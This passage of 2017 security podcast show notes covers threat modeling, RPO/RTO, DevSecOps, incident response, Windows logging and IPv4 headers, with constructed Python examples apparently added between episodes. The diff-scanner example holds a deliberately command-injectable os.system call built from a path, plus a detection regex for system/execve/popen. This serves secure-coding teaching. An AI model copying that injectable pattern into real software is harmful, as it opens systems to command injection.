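    """Return one (target, threat, crosses_boundary) tuple per applicable threat."""
    by_name = {e.name: e for e in elements}
    out = []
    for el in elements:
        for c in applicable(el):
            out.append((el.name, STRIDE[c], False))
    for f in flows:
        crosses = by_name[f.src].zone != by_name[f.dst].zone
        for c in PER_ELEMENT["data_flow"]:
            out.append((f.name, STRIDE[c], crosses))
    return out


def boundary_crossing_threats(elements, flows):
    """Threats on flows that cross a privilege boundary: review these first."""
    return [t for t in enumerate_threats(elements, flows) if t[2]]


# Constructed sample DFD: browser -> web app in the DMZ -> internal DB and audit log.
ELEMENTS = [
    Element("Browser", "external_entity", "internet"),
    Element("Web app", "process", "dmz"),
    Element("Orders DB", "data_store", "internal"),
    Element("Audit log", "data_store", "internal", is_log=True),
]
FLOWS = [
    Flow("HTTPS request", "Browser", "Web app"),
    Flow("SQL query", "Web app", "Orders DB"),
    Flow("Log write", "Web app", "Audit log"),
]

if __name__ == "__main__":
    for target, threat, crosses in enumerate_threats(ELEMENTS, FLOWS):
        print(f"{'*' if crosses else ' '} {target:14} {threat}")
```

Each generated row is a question to answer ("how is the SQL query tampered with across the DMZ boundary, and what mitigates it?"), not a finding; the value of the table is that it stops a review from forgetting whole categories, which is the "check a compliance box" failure mode the notes mention.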
https://en.wikipedia.org/wiki/Johari_window
Butler Lampson, Steve Lipner link: https://www.nist.gov/sites/default/files/documents/2016/09/16/s.lipner-b.lampson_rfi_response.pdf
Escalation Of Privilege card game: https://www.microsoft.com/en-us/download/details.aspx?id=20303
NIST CyberSecurity Framework: https://www.nist.gov/cyberframework
Data Classification Toolkit - https://msdn.microsoft.com/en-us/library/hh204743.aspx
Microsoft bug bar (security) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307404.aspx
Microsoft bug bar (privacy) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307403.aspx
OWASP threat Modeling page: https://www.owasp.org/index.php/Application_Threat_Modeling
OWASP Threat Dragon - https://www.owasp.org/index.php/OWASP_Threat_Dragon
Emergent Design: https://adam.shostack.org/blog/2017/10/emergent-design-issues/
Robert Hurlbut (workshop presenter at SourceCon Seattle) https://roberthurlbut.com/Resources/2017/NYMJCSC/Robert-Hurlbut-NYMJCSC-Learning-About-Threat-Modeling-10052017.pdf (much the same content as given at Source)
Adam’s Threat modeling book
http://amzn.to/2z2cNI1 -- sponsored link
Is the book still applicable?
New book
What traps do people fall into? Attacker-centered, asset-centered approaches
Close with “how do I get started on threat modeling?”
SecShoggoth’s Class “intro to Re”
Johari window? http://www.selfawareness.org.uk/news/understanding-the-johari-window-model
Published on: October 29, 2017
After last year's SOURCE Conference, I knew I needed to go again, not just because it was a local (Seattle) infosec conference, but because of the caliber of speakers and the range of topics that were going to be covered.
I got audio from two of the speakers at the SOURCE conference (@sourceconf on Twitter):
Lee Fisher and Paul English from PreOS Security about UEFI security and methods to secure your devices https://preossec.com/
Joe Basirico discusses the proper environment to get the best out of your bug bounty program.
points from his abstract:
Bug Bounty Programs - Why you want to invite security researchers to hack your products
Marketing your Security Program - How and why to market your security program. What to say, how to say it, and where to say it for maximum effectiveness.
How to Communicate with Security Researchers - What are security researchers expecting in communication, responsiveness, transparency, and time to fix.
Source conference YouTube Channel: https://www.youtube.com/channel/UCAPQk1fH2A4pzYjwTCt5-dw/videos (2017 is not available yet, but all talks from 2008-2015 are available)
agenda of the talks that occurred at Source Seattle 2017
https://www.sourceconference.com/seattle-2017-agenda
https://www.sourceconference.com/copy-of-seattle-2016-agenda-details
Published on: October 22, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-035-business_continuity-After_the_disaster.mp3
We are back this week after a bit of time off, and we're getting right back into it...
What happens after you enact your business continuity plan? Many times, it can force you to change processes and procedures... you may not even be doing business in the same country or datacenter, and you may need to change the way business is done.
We also talk a bit about 3rd party vendor reviews, and what would happen if your 3rd party doesn't have a proper plan in place.
Finally, we discuss the upcoming #reverseEngineering course starting on 30 October 2017 with Tyler Hudak, as well as some upcoming appearances for Ms. Berlin at SecureWV, GrrCon, and Bsides Wellington, #newZealand
---SHOW NOTES---
You have enacted your BC/DR plan
Step 1. Panic
Step 2. Panic more, or let your management panic
Step 3. Follow the plan… you do have a plan, right?
Enacting a BC/DR plan
RPO/RTO - https://www.druva.com/blog/understanding-rpo-and-rto/
Recovery Point Objective (RPO) describes the interval of time that might pass during a disruption before the quantity of data lost during that period exceeds the Business Continuity Plan’s maximum allowable threshold or “tolerance.”
https://en.wikipedia.org/wiki/Recovery_point_objective
Recovery Time Objective (RTO) is the duration of time and a service level within which a business process must be restored after a disaster in order to avoid unacceptable consequences associated with a break in continuity.
https://en.wikipedia.org/wiki/Recovery_time_objective
Excerpt from "Defensive Security Handbook" -
Buy from Amazon (sponsored link): http://amzn.to/2zcmWBY
Recovery Point Objective
The recovery point objective (RPO) is the point in time that you wish to recover to. That is, determining if you need to be able to recover data right up until seconds before the disaster strikes, or whether the night before is acceptable, or the week before, for example. This does not take into account how long it takes to make this recovery, only the point in time from which you will be resuming once recovery has been made. There is a tendency to jump straight to seconds before the incident; however, the shorter the RPO, the more the costs and complexity will invariably move upwards.
Recovery Time Objective
The recovery time objective (RTO) is how long it takes to recover, taken irrespective of the RPO. That is, after the disaster, how long until you have recovered to the point determined by the RPO.
To illustrate with an example, if you operate a server that hosts your brochureware website, the primary goal is probably going to be rapidly returning the server to operational use. If the content is a day old it is probably not as much of a problem as if the system held financial transactions whereby the availability of recent transactions is important. In this case an outage of an hour may be tolerable, with data no older than one day once recovered.
In this case the RPO would be one day, and the RTO would be one hour.
There is often a temptation for someone from a technology department to set these times; however, it should be driven by the business owners of systems. This is for multiple reasons:
RPO should be determined when working through a Business impact analysis (BIA)
https://www.ready.gov/business-impact-analysis
https://www.fema.gov/media-library/assets/documents/89526
There is always a gap between the actuals (RTA/RPA) and objectives
After an incident or disaster, a ‘Lessons Learned’ should identify shortcomings and adjust accordingly.
This may also affect contracts, or customers may require re-negotiation of their RTO/RPO requirements
If something happens 4 hours after a backup, and you have an hour until the next backup, you have to reconcile the lost information, or take it as a loss
Loss = profits lost, fines for SLAs
You may not be doing the same after the disaster. New processes, procedures
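Worked version of the gap between objectives and actuals described above, as an added example (not code from the handbook or the podcast): given backup times, the incident time and the restore time, it computes RPA/RTA and reports which objective was missed. The timestamps and objectives are constructed sample values matching the notes (backup, incident four hours later, brochureware RPO of one day and RTO of one hour).

```python
"""Measure achieved recovery point/time (RPA/RTA) against RPO/RTO objectives.

Added example; this is not code from the Defensive Security Handbook or the
podcast. Backup times, incident time, restore time and the objectives below
are constructed sample values chosen to match the notes above.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional


@dataclass
class RecoveryObjectives:
    rpo: timedelta  # most data loss the business owner will tolerate
    rto: timedelta  # longest outage the business owner will tolerate


@dataclass
class RecoveryActuals:
    rpa: timedelta      # data actually lost: incident minus last usable backup
    rta: timedelta      # outage actually suffered: restore minus incident
    rpo_gap: timedelta  # positive when the RPO was missed, and by how much
    rto_gap: timedelta  # positive when the RTO was missed, and by how much


def last_usable_backup(backups: List[datetime], incident: datetime) -> Optional[datetime]:
    """Most recent backup that completed before the incident began.

    A backup finishing after the incident may have captured corrupted or
    encrypted data, so it is not counted as a recovery point.
    """
    earlier = [b for b in backups if b < incident]
    return max(earlier) if earlier else None


def measure_actuals(objectives: RecoveryObjectives, backups: List[datetime],
                    incident: datetime, restored: datetime) -> RecoveryActuals:
    """Compute RPA/RTA for one incident and compare them with the objectives."""
    if restored < incident:
        raise ValueError("service cannot be restored before the incident starts")
    backup = last_usable_backup(backups, incident)
    if backup is None:
        raise ValueError("no backup predates the incident: recovery point is undefined")
    rpa = incident - backup
    rta = restored - incident
    return RecoveryActuals(rpa, rta, rpa - objectives.rpo, rta - objectives.rto)


def missed_objectives(actuals: RecoveryActuals) -> List[str]:
    """Names of the objectives the actuals exceeded, for the lessons-learned review."""
    missed = []
    if actuals.rpo_gap > timedelta(0):
        missed.append("RPO")
    if actuals.rto_gap > timedelta(0):
        missed.append("RTO")
    return missed


def run_scenario(rpo_hours: float, rto_hours: float) -> RecoveryActuals:
    """Constructed scenario from the notes: nightly backup at 02:00, incident
    4 hours later at 06:00, service back at 07:30 (90 minutes of outage)."""
    objectives = RecoveryObjectives(rpo=timedelta(hours=rpo_hours),
                                    rto=timedelta(hours=rto_hours))
    backups = [datetime(2017, 9, 1, 2, 0), datetime(2017, 9, 2, 2, 0)]
    incident = datetime(2017, 9, 2, 6, 0)
    restored = datetime(2017, 9, 2, 7, 30)
    return measure_actuals(objectives, backups, incident, restored)


if __name__ == "__main__":
    # Brochureware site: RPO one day, RTO one hour (the handbook's example).
    web = run_scenario(rpo_hours=24, rto_hours=1)
    print("brochureware missed:", missed_objectives(web))   # ['RTO']
    # Transaction system: RPO 15 minutes, RTO one hour.
    fin = run_scenario(rpo_hours=0.25, rto_hours=1)
    print("transactions missed:", missed_objectives(fin))   # ['RPO', 'RTO']
```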
Ms. Berlin’s appearances
Grrcon - http://grrcon.com/
Hack3rcon/SecureWV - http://securewv.com/
Oreilly Conference - https://conferences.oreilly.com/security/sec-ny/public/schedule/detail/61290
Experts Table?
Bsides Wellington (sold-out)
----
CLASS INFORMATION
Introduction to Reverse Engineering with Tyler Hudak
Starts on 30 October - 20 November
4 Mondays
Sign up on our Patreon (charged twice: half when you sign up, half again on 1 November)
Published on: October 16, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-SPECIAL003-Derbycon_audio.mp3
Mr. Boettcher, Ms. Berlin, and I went to Derbycon. In addition to the podcast with podcasters we did during the 3 days, I managed to grab another whole hour of audio from various people at the conference, just to give you an idea of the vibe of the conference, in case you were unable to attend.
We talked to the FOOOLs (http://www.bloomingtonfools.org/), and how they have done the lockpick village for the last 7 years.
We talk to Ms. Wynter (@sec_she_lady) about her experiences at her first Derbycon.
Mr. Matt Miller (@milhous30) talked about some of his #reverse #engineering challenges that were in the #Derbycon #CTF
Lots of great talks happened there this year, check them all out over on @irongeek's site (http://www.irongeek.com/i.php?page=videos/derbycon7/mainlist)
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: October 7, 2017
*Apologies for the continuity this was recorded before we went to Derbycon 2017.*
Preston Pierce is a recruiter. We wanted to have him on to discuss some issues with our industry. So we had him on to discuss hiring practices, how a recruiter can help a company recruit better talent, and how to stop companies looking for the 'unicorn' candidate.
Preston is a great guy and we learned a lot about how the recruiting process works, and how Preston's company works differently from other, less reputable companies.
We also discuss job descriptions, getting management buy in for a good candidate, and more.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-034-Preston_Pierce_recruiting_job_descriptions.mp3
Show Notes:
Blueteamers
Looking at job descriptions,
Fix if outdated or unnecessary
Managers
Be realistic about expectations
Recruiters
Better research of people
Discuss realistic demands from customers
You
Update your LinkedIn removing overly generalized terms (healthcare, for example)
When should you reach out to a recruiter? Right away? After you’ve already completed some leg work?
Companies do a poor job of marketing for their current openings.
Published on: October 2, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-SPECIAL002-Derbycon-Podcast_with_podcasters.mp3
SUPER NOT SAFE for kids (and probably adults, come to think of it). Really this is just us riffing about Derbycon (and I really love @oncee, and wished I'd gone to his stable talk, which you can listen to/watch here: http://www.irongeek.com/i.php?page=videos/derbycon7/s07-the-skills-gap-how-can-we-fix-it-bill-gardner).
We actually did talk about the skills gap, resume workshop held at Derbycon, and so much else.
If you haven't been to Derbycon, you should definitely make plans now to attend...
Published on: September 27, 2017
Zane Lackey (@zanelackey on Twitter) loves discussing DevOps, and DevSecOps (or is it 'SecDevOps'... 'DevOpsSec'?).
So we talk to him about the best places to get the most bang for your buck getting security into your new DevOps environment. What is the best way to do that? Have a listen...
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-033-Zane_Lackey_inserting_security_into_your_DevOps.mp3
--SHOW NOTES--
Security shifts from being a gatekeeper to enabling teams to be secure by default
Require a culture shift
Should that be implemented before the shift to CI/CD, or are we talking ‘indiana jones and the rock in the temple’?
How?
Secure coding?
Hardening boxes/Systems?
If it’s just dev -> prod, where does security have the chance to find issues (i.e. test and QA belong there)?
We used to have the ability for a lot of security injection points, but no longer
Lowers the number of people we have to harangue to be secure…?
Security success = baked in to DevOps
Shift from a ‘top down’ to ‘bottom up’
Eliminate FPs, and forward on real issues to devs
Concentrate on one or two types of vulnerabilities
Triage vulns from most important to least important
Go for ‘quick wins’, or things that don’t take a lot of time for devs to fix.
Grepping for ‘system(), or execve()’
Primitives (hashing, encryption, file system operations)
How do you stop a build going to production if it’s going out like that?
Do we allow insecurity to go to Production?
Or would it be too late to ‘stop the presses’?
“We’ll fix it in post…”
Instead of the ‘guardrail not speedbump’ you are the driving instructor...
But where does security get in to be able to talk to devs about data flow, documentation of processes?
5 Y’s - Why are you doing that?
Setup things like alerting on git repos, especially for sensitive code
Changing a sensitive bit of code or file may notify people
Will make people think before making changes
Put controls in terms of how they enable velocity
You like you some bug bounties, why?
Continuous feedback
Learn to find/detect attackers as early in the attack chain
Refine your vuln triage/response
Use bug reports as IR/DFIR...
https://www.youtube.com/watch?v=ORtYTDSmi4U
https://www.slideshare.net/zanelackey/how-to-adapt-the-sdlc-to-the-era-of-devsecops
http://www.slideshare.net/zanelackey/building-a-modern-security-engineering-organization
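The two cheap checks from the notes above (grepping new code for system()/execve()-style calls, and alerting when sensitive code is changed) as one added example, not Zane Lackey's or the podcast's code: it walks a unified diff once and returns findings with new-file line numbers. The diff, the sensitive path prefixes and the call list are constructed sample input.

```python
"""Flag risky primitives and sensitive-file changes in a unified diff.

Added example, not Zane Lackey's or the podcast's code. It implements the two
cheap checks from the notes above: grep added lines for a narrow set of
dangerous calls (system(), execve(), popen()), and alert when a file under a
sensitive path is touched. The diff, the path prefixes and the call list are
constructed sample input; tune them to your own code base.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Narrow and high-signal on purpose: one or two vulnerability classes at a time
# keeps the false-positive rate low enough that developers keep reading alerts.
RISKY_CALLS = re.compile(r"\b(system|execve|popen)\s*\(")
HUNK_HEADER = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")
# Constructed list of path prefixes whose changes should notify the security team.
SENSITIVE_PREFIXES = ("auth/", "crypto/", "payments/")


@dataclass
class Finding:
    path: str
    line_no: int  # line number in the new version of the file (0 = whole file)
    kind: str     # "risky_call" or "sensitive_path"
    detail: str


def scan_diff(diff: str) -> List[Finding]:
    """Walk a unified diff once, tracking new-file line numbers per hunk."""
    findings: List[Finding] = []
    path: Optional[str] = None
    new_line = 0
    for raw in diff.splitlines():
        if raw.startswith("+++ "):
            path = raw[4:].strip()
            if path.startswith("b/"):
                path = path[2:]
            if path.startswith(SENSITIVE_PREFIXES):
                findings.append(Finding(path, 0, "sensitive_path",
                                        "change touches a sensitive file"))
            continue
        if raw.startswith("--- ") or raw.startswith("\\"):
            continue  # old-file name, or "\ No newline at end of file"
        header = HUNK_HEADER.match(raw)
        if header:
            new_line = int(header.group(1))
            continue
        if raw.startswith("+"):
            added = raw[1:]
            if RISKY_CALLS.search(added):
                findings.append(Finding(path or "?", new_line, "risky_call", added.strip()))
            new_line += 1
        elif raw.startswith("-"):
            pass  # removed lines do not occupy a line in the new file
        else:
            new_line += 1  # context line
    return findings


# Constructed diff: a shell-out added to a utility, plus a token lifetime change
# under auth/ that should notify reviewers even though no risky call appears.
SAMPLE_DIFF = """\
diff --git a/tools/cleanup.py b/tools/cleanup.py
--- a/tools/cleanup.py
+++ b/tools/cleanup.py
@@ -10,4 +10,6 @@ def cleanup(path):
     log.info("cleaning %s", path)
-    size = du(path)
+    # quick fix: shell out so globs work
+    size = os.system("du -sh " + path)
+    subprocess.run(["ls", path])
     return size
diff --git a/auth/tokens.py b/auth/tokens.py
--- a/auth/tokens.py
+++ b/auth/tokens.py
@@ -1,3 +1,3 @@
-TOKEN_TTL = 3600
+TOKEN_TTL = 86400 * 30
 def issue(user):
     return sign(user, TOKEN_TTL)
"""

if __name__ == "__main__":
    for f in scan_diff(SAMPLE_DIFF):
        print(f"{f.kind}: {f.path}:{f.line_no}: {f.detail}")
```

Wired into a pre-receive hook or CI step, the "risky_call" findings go back to the developer and the "sensitive_path" findings go to whoever owns that code.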
In SAST, a modern way to decide what to test is start with a small critical vuln, like OS command injection. Find those and get people to fix it. BUT don’t developers or project teams get unhappy [sic] if you keep "moving the goal post" as you add in the next SAST test and the next SAST test. How do you do that and not piss people off?
[15:16]
How do you make development teams self sufficient when it comes to writing a secure application? Security is a road block during a 3 month release schedule….getting "security approval" in a 3 day release cycle is impossible.
[15:17]
But then…what is the job for the security team? If DevOps with security is done right, do you still need a security team, if so what do they do???? Do they write more code???
I don't think you're Dev'ops'ing security out of a job...but where does security see itself in 5 years?
Last one if there is time and interest. If Zane Lackey was a _maintainer_ of an open source project, what dev ops sec lessons would he apply to that dev model…to the OpenSource model?
(We've got internal projects managed with the open source model...so I'm interested in this one)
Even without any of those questions the topics he covered in his black hat talk are FULL of content to talk about. Heck, even bug bounties are a topic of conversation.
The idea of a feedback loop to dev...where an application under attack in a pen test can do fixes live....how that is possible is loads of content.
Published on: September 17, 2017
Everyone should be doing incident response tabletops, even if it's not a dedicated task in your organization. It allows you to find out what you might be lacking in terms of processes, manpower, requirements, etc.
This week, we discuss what you need to do to get ready for one, and how those should go in terms of helping your organization understand how to handle the aftermath.
And in case you've been under a rock, #equifax was breached. 143 million credit records are in the ether. We discuss the facts as of 9 September 2017, and what this means to the average user.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-032-incident_response-equifax-done2.mp3
---SHOW NOTES---
Incident response
Must go beyond ‘threats’.
What is in your environment
Struts aren’t a threat, or are they?
Equifax didn’t think so at the time…
Insider threat
External entities
Libraries
plugins/themes used (Wordpress)
Risk analysis
Qualitative
Quantitative
What makes a good incident response exercise?
Once security controls around use cases have been created and implemented, tabletop exercises and drills can test them as a proof of concept. A tabletop exercise is a meeting of key stakeholders and staff that walks step by step through the mitigation of some type of disaster, malfunction, attack, or other emergency in a low-stress situation. A drill is when staff carry out as many of the processes, procedures, and mitigations that would be performed during one of the emergencies as possible.
While drills are limited in scope, they can be very useful to test specific controls for gaps and possible improvements. A disaster recovery plan can be carried out to some length, backups can be tested with the restoration of files, and services can be failed over to secondary cluster members.
Tabletop exercises are composed of several key groups or members.
What to include in the tabletop:
• A handout to participants with the scenario and room for notes.
• Current runbook of how security situations are handled.
• Any policy and procedure manuals.
• List of tools and external services.
Post-exercise actions and questions:
• What went well?
• What could have gone better?
• Are any services or processes missing that would have improved resolution time or accuracy?
• Are any steps unneeded or irrelevant?
• Identify and document issues for corrective action.
• Change the plan appropriately for next time.
Tabletop Template
The Federal Emergency Management Agency (FEMA) has a collection of different scenarios, presentations, and tabletops that can be used as templates.
Derbycon channel on Slack
Intro to RE class
https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax
Published on: September 12, 2017
This week, we met up with Robert Sell to discuss competing in the DefCon Social Engineering CTF. You're gonna learn how he prepared for the competition, and learn about some of the tactics you could use to compete in future SE CTF events.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-031-Robert_Sell-Defcon-SE-CTF.mp3
Published on: September 4, 2017
This week, we discuss the lack of information and where you might find more information about certain vulnerabilities. Seems like many companies fail to give out necessary and actionable information without paying an arm and a leg.
We also go over our DerbyCon CTF walkthrough, and discuss the steps to solve it.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-030-vulnerability_OSINT-derbycon_CTF_walkthrough.mp3
Ms. Berlin is going to be at Bsides Wellington! Get your Tickets NOW!
--show notes--
NCC group talks in Seattle
NIST guidelines - no security questions, no SMS based 2fa
Vuln OSINT
Sites have information like Spokeo…
Breadcrumbs
Take Java for example (CVE-2017-10102): info is sparse
Other sites have more
https://tools.cisco.com/security/center/viewAlert.x?alertId=54521 - worse than Oracle’s site (impressive crappery)
Some are better: RHEL is fairly decent
https://access.redhat.com/errata/RHSA-2017:2424
Ubuntu has some different tidbits
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-10102.html
Arch has info
https://security.archlinux.org/CVE-2017-10102
Point is, just because you use a specific OS, don’t limit yourself… other OSes may contain more technical info. Some maintainers like to dig, like you.
https://vuldb.com/ - estimates the value of a PoC for a vuln (5-25K USD for CVE-2017-10102)
Derbycon CTF walkthrough
Looking for an instructor for an ‘intro to RE’ course.
Dr. Pulaski = Diana Muldaur
Dr. Crusher = Gates McFadden
Published on: August 29, 2017
This week was one heck of a show. If you are a blueteamer and make use of the "Windows Logging Cheat Sheet", you are no doubt aware of how important it is to log certain events, and to set hostile conditions to make malware/Trojans/virus have a harder time avoiding detection.
What if I told you the same updates we suggested last week to NEVER delay actually undo all your hardening on your system and leave your logfiles set to defaults, set all file associations for suspect files like pif, bat, scr, bin back to defaults, and allow your users to be victims again, even after you've assured them they are safe to update?
After a sequence of tweets from Michael Gough about just this exact thing, we laid out all the information: how and what gets reverted that will open you back up to possible infections, as well as how some hardening standards actually make it harder to be secure.
Finally, we discuss the CIS benchmarks, and how many of the settings in them are largely outdated and why they need to be updated.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-029-windows_updates_clobbers_security__settings_CIS_hardening_needs_an_update.mp3
--SHOW NOTES--
Gough says ‘something is bad about CIS’
CIS benchmarks need revamping -- BrBr
/var, /var/log in separate partitions?
Password to access grub?
Disable root login to serial pty?
Many cloud instances and VMs don’t have serial ports (not in a traditional sense)
What’s the use case for using them? What problem will they solve?
Misconfiguration?
Proper logging?
NTP sources?
So many, dilution possible
SCAP
OVAL
STIG (complex as well)
CIS
Infosec: how do we get IT past the “that’s good enough”, as many customers and compliance frameworks want to see ‘hardening’ done.
What is a good baseline?
Write your own?
How do we tell them that it’s not going to stop ‘bad guys’ ( or anyone really)? It’s not ‘security’, and it’s technically not even ‘best practices’ anymore (not all of it, anyway)
On windows, they are needlessly complicated and cause more problems
Roles have to be created “backup admin”
Can cause unintended issues
https://twitter.com/HackerHurricane/status/898629567056797696
https://twitter.com/HackerHurricane/status/892838553528479745
Category          | Sub Category                   | 7/2008 | 8.1 | 2012 | Win-7 | Win-8.1 | WLCS | ThisPC | Notes
Detailed Tracking | Process Termination            | NA     | NA  | NA   | NA    | NA      | S/F  | S      |
Object Access     | File Share                     | NA     | NA  | NA   | NA    | NA      | S/F  | S/F    |
Object Access     | File System                    | NA     | NA  | NA   | F     | NA      | S    | S/F    |
Object Access     | Filtering Platform Connection  | NA     | NA  | NA   | NA    | NA      | S    | S      |
Object Access     | Filtering Platform Packet Drop | NA     | NA  | NA   | NA    | NA      | NA   | NA     |
Log Sizes:
-------------
Security - 1 GB
Application – 256MB
System – 256MB
PowerShell/Operational – 512MB – 1 GB v5
Windows PowerShell – 256MB
TaskScheduler – 256MB
Setting                  | 7/2008 | 8.1 | 2012 | Win-7 | Win-8.1 | WLCS | ThisPC
Log Process Command Line | (5)    | (5) | (5)  | (5)   | (5)     | Yes  | Yes
PowerShell Logging v5    | (5)    | (5) | (5)  | (5)   | (5)     | Yes  | Yes
TaskScheduler Log        | (5)    | (5) | (5)  | (5)   | (5)     | (1)  | Yes
(5) - CIS Benchmarks, USGCB, and AU ACSC do not cover this critical auditing item
Published on: August 20, 2017
This week went in a different direction from what we normally do. We discussed some news, a twitter conversation about someone from the 'ahem' "media" that suggests that you disable Windows Update on your home devices. We discuss the pros and mostly cons of doing that, and alternatives to protect your home and work devices from that.
We talked about the Comcast Xfinity appliances and how they have a vulnerability that could make traffic created by people outside of your house look like it was coming from your home network.
We discuss the public disclosure of Carbon Black's architecture and seeming sharing of customer events to 3rd parties... it's not all black and white, and we discuss those here.
---SHOW NOTES---
Twitter discussion -
https://twitter.com/Computerworld/status/894611609355603968
[sic] “tons of problems with Automatic Update patches so far this year”
[sic] “if you’re savvy enough to be reading this, you should consider turning Auto Update off, too”
Advocating disabling auto-updates in an OS is reckless.
Home networks for majority of users is completely flat
One Vlan (e.g. 192.168.1.0/24)
‘Savvy’ = technical
Which many of our users are not
Probable scenario: Bad guy targets you or family through a phish. They gain access to family computers, and pivot through those to your office computer
Blue teamers: suggest backups and backup options to keep their data safe and allow them to feel safer with automatic updates enabled, and VLANs if possible
Typically enterprises will hold off a few days or a week to push out Windows patches; Auto-updates are controlled.
The twitter guy said that in more recent Windows versions, WU take precedence over WSUS… need to confirm that… -- brbr
Confirmed… you can override WU… https://blogs.technet.microsoft.com/wsus/2017/08/04/improving-dual-scan-on-1607/
--this-- not because of title, but because of people jumping to conclusions (example of irresponsible disclosure)
Agreed… that shiz is damaging -- brbr
NoStarch TCP guide - https://www.nostarch.com/tcpip.htm
IPV4 -https://en.wikipedia.org/wiki/IPv4
[graphic of IPv4 header from wikipedia article]
IHL - size of the header (minimum of 5)
DSCP - has to do with traffic shaping and QoS
ECN - notifies the network of congestion and allows infrastructure to implement congestion controls to compensate
Must be supported by both ends, and completely optional to enforce
Total Length - total size of the packet
Identification - interesting field: you can use it to hide data (Covert_TCP); otherwise it’s “used for uniquely identifying the group of fragments of a single IP datagram”
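A parser for the header fields listed above, as an added example (not code from the NoStarch guide or the Wikipedia article): it decodes IHL, DSCP, ECN, Total Length, Identification and the rest from raw bytes, rejects impossible lengths, and verifies the header checksum. SAMPLE_PACKET is a constructed header with a valid checksum.

```python
"""Parse the IPv4 header fields listed above from raw bytes and verify the checksum.

Added example; not code from the NoStarch guide or the Wikipedia article.
SAMPLE_PACKET is a constructed 20-byte header (IHL 5, no options) carrying
an 8-byte payload, with a valid header checksum.
"""
import struct
from dataclasses import dataclass


@dataclass
class IPv4Header:
    version: int
    ihl: int              # header length in 32-bit words; minimum 5 (20 bytes)
    dscp: int             # 6 bits: traffic class for QoS / shaping
    ecn: int              # 2 bits: congestion notification, optional at both ends
    total_length: int     # header plus payload, in bytes
    identification: int   # groups the fragments of one datagram
    flags: int            # 3 bits: reserved, DF (don't fragment), MF (more fragments)
    fragment_offset: int  # 13 bits, in 8-byte units
    ttl: int
    protocol: int
    checksum: int
    src: str
    dst: str
    checksum_ok: bool


def header_checksum(header: bytes) -> int:
    """Ones'-complement sum of 16-bit words with the checksum field zeroed."""
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    if len(zeroed) % 2:
        zeroed += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(zeroed) // 2), zeroed))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(packet: bytes) -> IPv4Header:
    """Decode the fixed 20-byte part of the header; reject impossible lengths."""
    if len(packet) < 20:
        raise ValueError("shorter than the minimum IPv4 header")
    (ver_ihl, tos, total_length, ident,
     flags_frag, ttl, proto, csum) = struct.unpack("!BBHHHBBH", packet[:12])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    if version != 4:
        raise ValueError("not an IPv4 packet")
    if ihl < 5:
        raise ValueError("IHL below the minimum of 5")
    hlen = ihl * 4
    if len(packet) < hlen:
        raise ValueError("truncated: IHL claims more header bytes than present")
    if total_length < hlen:
        raise ValueError("Total Length smaller than the header itself")
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    return IPv4Header(
        version=version, ihl=ihl,
        dscp=tos >> 2, ecn=tos & 0x03,
        total_length=total_length, identification=ident,
        flags=flags_frag >> 13, fragment_offset=flags_frag & 0x1FFF,
        ttl=ttl, protocol=proto, checksum=csum, src=src, dst=dst,
        checksum_ok=header_checksum(packet[:hlen]) == csum,
    )


# Constructed packet: DSCP 46 (EF), ECN 1, length 28, ID 0xBEEF, DF set,
# TTL 64, UDP (17), 192.168.1.10 -> 10.0.0.1, checksum 0xAF75, 8 payload bytes.
SAMPLE_PACKET = bytes.fromhex(
    "45b9001cbeef40004011af75c0a8010a0a000001"
    "0035003500080000"
)

if __name__ == "__main__":
    print(parse_ipv4(SAMPLE_PACKET))
```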
https://github.com/tcstool/Fireaway
http://www.securityweek.com/coolest-talk-defcon-25-no-one-writing-about
Published on: August 12, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-026-Ally_miller_machine-learning-AI.mp3
Ally Miller (@selenakyle) joined us this week to discuss Machine Learning and #Artificial #Intelligence. It seems like every new security product employs one or both of these terms. She did the keynote at Bsides Las Vegas on topics of #Machine #Learning and #Behavioral #Economics.
We asked Ms. Miller to join us here to discuss what ML and AI are, how algorithms work to analyze the data to come to the right conclusion. What is required to get a useful algorithm, and how much or little human interaction is required?
We also discuss a bit of history with her, how IDS/IPS were just dumber versions of machine learning, with 'tweaks' being new Yara or snort rules to tell the machine what to allow/disallow.
Finally, for people doing our 2017 DerbyCon CTF, instructions on how to win are in the show, so please take a listen.
show notes
What amount of data is required to properly train the algorithms?
How do you ensure that the training data is clean (or perhaps how do you determine what causes a false positive or negative)?
